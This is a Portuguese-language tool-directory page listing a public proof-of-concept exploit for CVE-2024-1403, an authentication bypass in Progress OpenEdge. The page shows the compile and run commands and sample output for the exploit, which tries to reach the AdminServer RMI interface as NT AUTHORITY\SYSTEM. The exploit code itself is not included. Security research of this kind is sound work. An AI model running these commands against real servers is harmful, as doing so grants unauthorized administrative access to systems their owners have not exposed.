Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-1403 — Progress OpenEdge Bypass de Autenticação | Kitploit
Ferramentas/GitHubGitHub/horizon3ai/cve-2024-1403
Autenticação e AutorizaçãoAnálise de VulnerabilidadesExploraçãoSegurança WebTestes de PenetraçãoRed Teaming
GitHubhorizon3ai/cve-2024-1403

CVE-2024-1403

Progress OpenEdge Bypass de Autenticação

Ver Repositório
177há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-1403 Bypass de Autenticação do Progress OpenEdge

Um exploit proof of concept para o Progress OpenEdge CVE-2024-1403.

Post no Blog

Mais detalhes aqui: https://www.horizon3.ai/attack-research/cve-2024-1403-progress-openedge-authentication-bypass-deep-dive

Uso

Você deve fornecer suas próprias versões dos seguintes jars:

  • progress.jar
  • oeauth-12.8.-.jar
  • osmetrics.jar
  • juniper.jar

Compilação

root@kitploit:~
$ javac -cp progress.jar:oeauth-12.8.0.jar Main.java

Uso

Executar este script tentará conectar à interface RMI do AdminServer usando a credencial NT AUTHORITY\SYSTEM.

root@kitploit:~
$ java -cp progress.jar:oeauth-12.8.0.jar:osmetrics.jar:juniper.jar:. Main <target_ip>
com.progress.system.SystemPlugIn
	com.progress.chimera.common.IChimeraRemoteObject
	com.progress.system.ISystemPlugIn

com.progress.agent.database.AgentPlugIn
	com.progress.chimera.common.IChimeraRemoteObject
	com.progress.agent.database.IAgentPlugIn

com.progress.ubroker.tools.NSRemoteObject
	com.progress.chimera.common.IChimeraHierarchy
	com.progress.ubroker.tools.IYodaRMI
	com.progress.ubroker.tools.IYodaSharedResources

com.progress.ubroker.tools.UBRemoteCommand
	com.progress.chimera.common.IChimeraRemoteCommand

com.progress.juniper.admin.JAPlugIn
	com.progress.chimera.common.IChimeraRemoteObject
	com.progress.juniper.admin.IJAPlugIn

com.progress.agent.smdatabase.SMPlugIn
	com.progress.chimera.common.IChimeraRemoteObject

Siga a Equipe de Ataque da Horizon3.ai no Twitter para as últimas pesquisas de segurança:

  • Equipe de Ataque Horizon3
  • James Horseman
  • Zach Hanley

Aviso Legal

Este software foi criado puramente para fins de pesquisa acadêmica e para o desenvolvimento de técnicas defensivas eficazes, e não se destina a ser usado para atacar sistemas, exceto quando explicitamente autorizado. Os mantenedores do projeto não são responsáveis nem se responsabilizam pelo uso indevido do software. Use com responsabilidade.

Baixar ferramenta